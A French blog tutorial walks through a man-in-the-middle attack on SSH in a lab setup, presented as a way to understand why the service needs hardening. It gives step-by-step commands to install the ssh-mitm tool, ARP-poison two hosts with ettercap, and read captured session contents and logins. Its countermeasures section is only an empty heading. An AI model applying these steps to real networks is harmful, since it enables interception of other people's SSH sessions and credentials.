top of page
cloud-vds.png
  • 2 Base de données

  • 2 VPS AMD

  • 4 instances ARM

  • Stockage 100 Go

  • 50k appels API

theme-light-dark-white.png

Comment effectuer une attaque Man in the Middle - MITM sur le protocole SSH

Dernière mise à jour : 9 nov. 2022

Bonjour,


Il est essentiel de savoir comment est réaliser une attaque de l'homme du milieu pour mesurer l'importance d'appliquer les contre-mesures de sécurisation du service SSH.


Je vous propose de commencer à travailler sur l'environnement suivant :

  • Un serveur Kali-Linux -> Attaquant

  • Un serveur SSH sur Linux -> Cible 1

  • Un client SSH Windows ou Linux -> Cible 2


Etape 1 : Récupération et installation de SSH-MITM


Pour commencer il faut mettre à jour la liste des packages de notre Kali-Linux :

apt update

Il faudra ensuite récupérer le logiciel SSH-MITM depuis GitHub :

git clone https://github.com/jtesta/ssh-mitm

Plusieurs étapes seront à réaliser, se rendre dans répertoire d'installation, définir le

format de langage US-utf8 puis lancer le script d'installation :

cd ssh-mitm
export LANG=en_US.utf-8
sudo ./install.sh

La commande « export LANG=en_US.utf-8 » exporte via une variable d’environnement, la langue par défaut utilisée au moment de l’installation de l’outil (anglais avec un encodage UTF-8). Sans cet export, un message d’erreur empêche l’installation.


./ permet de lancer le script shell install.sh présent dans le dossier ssh-mitm.


Lors de cette installation, il peut vous être demandé d’installer AppArmor pour restreindre les droits de ssh-mitm sur la machine. Si c'est le cas, acceptez la proposition.


Nous pouvons maintenant lancer le service ssh-mitm qui écoutera sur le port 2222 :

sudo ./start.sh

Il est facilement possible de vérifier quelles sont les services liés aux ports ouverts avec :

ss -ltnp

Etape 2 : Réalisation de l'attaque MITM à l'aide d'ettercap


Les deux adresses IP doivent être remplacer par celles de votre serveur SSH Linux et de votre client SSH Windows ou Linux.


sudo ettercap -i eth0 -T -M arp /192.168.x.x// /192.168.x.x//

  • -T : lance ettercap en mode texte

  • -M : indique que l'on lance une attaque de type "Man in the middle"

  • 192.168.x.x : serveur SSH / 192.168.x.x : client SSH -> adresses IP des victimes


Je vous propose de lancer Wireshark sur notre Kali-Linux pour vérifier l'efficacité de l'empoisonnement de la table ARP (ARP Poisoning).


Etape 3 : Récupération des informations transmises par SSH


Tout d'abord il est nécessaire d'arrêter l'attaque en appuyant sur " h " puis sur " q ".


Le fichier généré /home/ssh-mitm/shell_session_0.txt contient l'ensemble des informations ayant transité entre le client et le serveur SSH lors de l'attaque man in the middle.


Il est aussi parfois possible de retrouver les logins utilisés directement depuis le fichier auth.log contenant les journaux d'authentifications du Kali-Linux.

Vous pouvez le visionner comme ceci :

cat /var/log/auth.log

Etape 4 : Renforcement de la sécurité du service openSSH


1 commentaire

Posts similaires

Voir tout

1 opmerking


Ka Lix
Ka Lix
17 mei 2023

Très bien expliquer

Like

Titre

CONTENU

CONTENU

Chargement...

Chargement...

Chargement...

bottom of page